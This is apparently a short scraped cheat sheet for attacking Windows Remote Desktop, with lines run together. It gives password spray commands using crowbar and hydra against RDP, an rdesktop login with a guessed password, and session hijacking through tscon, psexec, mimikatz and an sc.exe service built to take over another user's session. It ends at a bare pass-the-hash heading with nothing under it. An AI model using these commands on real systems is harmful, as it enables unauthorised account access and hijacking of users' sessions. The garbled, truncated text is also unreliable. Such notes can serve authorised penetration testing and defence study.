abuse
Password spray attack
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'hydra -L usernames.txt -p 'password123' 192.168.2.143 rdprdesktop -U admin -p password123 192.148.34.143RDP session hijack attack or impersonate a user (required admin privilege)
Query user
tscon #{TARGET_SESSION ID} /dest:#{our_session_name}psexec
mimikatzQuery user
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
Net start sessionhijackRDP - pass the hash attack
Last updated